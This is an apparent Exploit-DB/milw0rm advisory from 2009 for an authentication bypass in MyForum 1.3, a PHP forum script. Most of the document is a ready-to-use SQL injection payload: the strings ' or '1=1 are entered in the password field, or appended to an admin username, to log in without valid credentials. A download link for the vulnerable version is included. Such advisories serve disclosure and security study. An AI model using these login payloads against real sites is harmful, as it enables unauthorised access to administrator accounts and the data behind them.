MyForum 1.3 - Authentication Bypass

EDB-ID:

8803


Platform:

PHP

Published:

2009-05-26

 ################################################################################################
[+] MyForum 1.3 (Auth Bypass) Remote SQL Injection
[+] Discovered By : ThE g0bL!N      
[+] Greetz : All my freind      
[+] Note: Tested On localhost :)
[+] http://www.easy-script.com/scripts-dl/myforumv1.3.zip
################################################################################################
Exploit:
-------
Username: [real_admin_name]
Password:' or '1=1
Or
Username: [real_admin_name]' or '1=1
Password:ThE g0bL!N
###############################################################################################

# milw0rm.com [2009-05-26]